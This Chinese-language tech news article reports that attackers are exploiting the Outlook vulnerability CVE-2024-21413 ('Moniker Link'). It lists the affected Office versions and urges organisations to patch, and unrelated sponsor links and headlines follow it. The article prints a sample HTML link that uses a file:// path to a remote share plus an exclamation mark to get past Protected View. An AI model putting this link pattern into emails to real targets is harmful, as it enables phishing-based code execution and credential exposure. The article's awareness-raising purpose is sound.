黑客利用Outlook漏洞展开攻击 只需打开带有恶意链接的邮件即可触发漏洞
CVE-2024-21413 漏洞是微软在 2024 年 1 月公布并修复的安全漏洞,该漏洞由网络安全公司 CheckPoint 安全研究人员 Haifei Li 发现并通报给微软,主要涉及到 Outlook 邮件客户端的远程代码执行问题。
该漏洞影响 Microsoft Office 2016、Microsoft Office 2019、Microsoft Office LTSC 2021、Microsoft 365 企业版应用,漏洞评分达到 9.8/10 分。
这枚漏洞的描述是存在缺陷的 Outlook 版本打开带有恶意链接的电子邮件时输入验证不当,借助漏洞黑客可以绕过受保护的视图 (该视图会以只读方式打开 Office 文件用来阻挡嵌入的有害内容) 并以编辑模式打开恶意的 Office 文件。
在这种情况下黑客可以向目标组织发送包含恶意代码的钓鱼邮件,只需要目标组织的员工打开该邮件即可触发漏洞并实现远程代码执行,因此造成的危害还是非常大的。
目前已经有黑客开始利用这枚漏洞展开攻击,考虑到其潜在危害性,如果企业至今没有升级 Outlook 版本封堵漏洞那可能会出现严重的安全问题。
CheckPoint 的研究人员也透露了该漏洞的工作方式:
这个被称为 Moniker Link 的漏洞可以让黑客使用 file:// 文件协议指向黑客控制的服务器 URL 并添加感叹号来绕过 Outlook 内置的受保护视图。
#下面为示例代码,基于安全考虑研究人员并未公布完整的利用方式 *<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
考虑到这枚漏洞已经公布 1 年了,这时候才有黑客利用也不是让人惊讶的事情,如果都 1 年了企业还没有更新 Outlook 封堵漏洞那也只能自求多福了。
关注公众号:拾黑(shiheibook)了解更多
赞助链接:
关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
- 欧元人民币汇率2024年10月12日
- SelectDB基于Apache Doris开发的新一代实时数据仓库
- Fingerprintjs:告别隐身 浏览器指纹识别技术
- PDFSigner 免费给PDF文档签章的工具
- 数字化转型,微软 Surface 商用解决方案实现行业革新!
- 中国联通和中国电信深耕共建共享:为全球运营商分享中国方案
- 电脑报恭祝全国读者新春快乐!
- 美国与韩国举行第三次商用太空对话
- 商业应用的数字化创新“遍地开花”,微软将多样化能力渗透到千行百业
- 对不起IE,我欠你一声谢谢
- 新春致辞丨中国铁塔董事长佟吉禄:深入贯彻十九届五中全会精神 全力推动新时期高质量发展
- 国外手机生态已做到完美?国产的真就那么难用吗